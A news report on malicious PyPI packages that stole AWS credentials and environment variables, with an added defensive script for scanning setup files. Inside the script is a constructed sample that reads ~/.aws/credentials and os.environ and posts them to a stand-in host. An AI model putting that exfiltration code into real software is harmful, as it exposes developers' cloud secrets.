Sonatype researchers discovered malicious code in multiple Python packages that uploaded users’ Amazon Web Services (AWS) credentials and environment variables to a publicly exposed domain.
Sonatype’s automated malware detection system initially discovered the malicious packages, after which the company’s researchers reported them to the Python Package Index (PyPI) team.
The packages and the endpoint have since been taken down.
“It remains yet to be known who the actors behind these packages are and what is their ultimate goal,” Sonatype security researcher Ax Sharma said.
The malicious packages were identified as “loglib-modules”, “pyg-modules”, “pygrata”, “pygrata-utils”, and “hkg-sol-utiils”.
Sharma said that the “loglib-modules” and “pyg-modules” packages target developers familiar with the legitimate “loglib” and “pyg” libraries.
Sonatype security researchers Jorge Cardona and Carlos Fernandez determined that the packages either contain code that reads and extracts developers’ sensitive data or install dependencies that do the same.
Sharma explained that the “loglib-modules” and “pygrata-utils” packages outright contain lines of malicious code, while “pygrata” installs one of the former packages as a dependency to accomplish the same functionality.
The code in “loglib-modules” collected AWS credentials, network interface information, and environment variables.
The script then attempted to upload this data to one or more endpoints hosted on the pygrata.com domain.
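The behaviour just described (reading the AWS credential file and the whole environment, then posting it to an outside host) leaves recognisable traces in a package's install-time code. The following static triage script is an added example, not Sonatype's detection system or any of the packages' code; the sample source and the host name `collector.example` are constructed for illustration, and `REPORTED_NAMES` is the list of package names given above.

```python
import ast
import re

# Package names reported in the article.
REPORTED_NAMES = {"loglib-modules", "pyg-modules", "pygrata",
                  "pygrata-utils", "hkg-sol-utiils"}
CREDENTIAL_PATH = re.compile(r"\.aws/(credentials|config)")
HTTP_URL = re.compile(r"https?://([^/\s]+)")
UPLOAD_FUNCS = {"urlopen", "post", "put", "request"}


def scan_setup_source(source: str) -> dict:
    """Static triage of a setup.py / __init__.py body: flags reads of the
    AWS credential files, use of os.environ as a whole object (not a
    single-key lookup), and HTTP calls plus the hosts they reference."""
    tree = ast.parse(source)
    # Attribute nodes that are indexed, e.g. os.environ["HOME"], are benign.
    subscripted = {id(n.value) for n in ast.walk(tree)
                   if isinstance(n, ast.Subscript)}
    out = {"credential_paths": [], "reads_whole_environ": False,
           "http_calls": 0, "hosts": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if CREDENTIAL_PATH.search(node.value):
                out["credential_paths"].append(node.value)
            m = HTTP_URL.match(node.value)
            if m:
                out["hosts"].append(m.group(1))
        elif (isinstance(node, ast.Attribute) and node.attr == "environ"
              and id(node) not in subscripted):
            out["reads_whole_environ"] = True
        elif isinstance(node, ast.Call):
            fn = node.func
            name = fn.attr if isinstance(fn, ast.Attribute) else getattr(fn, "id", "")
            if name in UPLOAD_FUNCS:
                out["http_calls"] += 1
    return out


def is_reported_name(name: str) -> bool:
    """Normalise the way pip does (PEP 503: case-fold, runs of -_. -> -)."""
    return re.sub(r"[-_.]+", "-", name).lower() in REPORTED_NAMES


# Constructed sample resembling the behaviour described above (not the
# real package code): reads the credential file and env, then posts them.
SAMPLE = '''
import os, requests
data = {"env": dict(os.environ),
        "aws": open(os.path.expanduser("~/.aws/credentials")).read()}
requests.post("http://collector.example/upload", json=data)
'''
```

Run `scan_setup_source` over each `setup.py` in a vendored or cached wheel/sdist before installation; a hit on all three signals at once is a strong reason to block the package and inspect it by hand.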
“The usage of the PyGrata[.]com domain and the names of some of the malicious packages (pygrata-utils) weren’t imminently clear to us as to their purpose,” Sharma said.
The researchers noted that the endpoints contained hundreds of text files that any web user could access.
“Troublingly, the endpoints hosting this information in the form of hundreds of .TXT files were not secured by any authentication barrier, effectively permitting any party on the web to access these credentials,” Sharma said.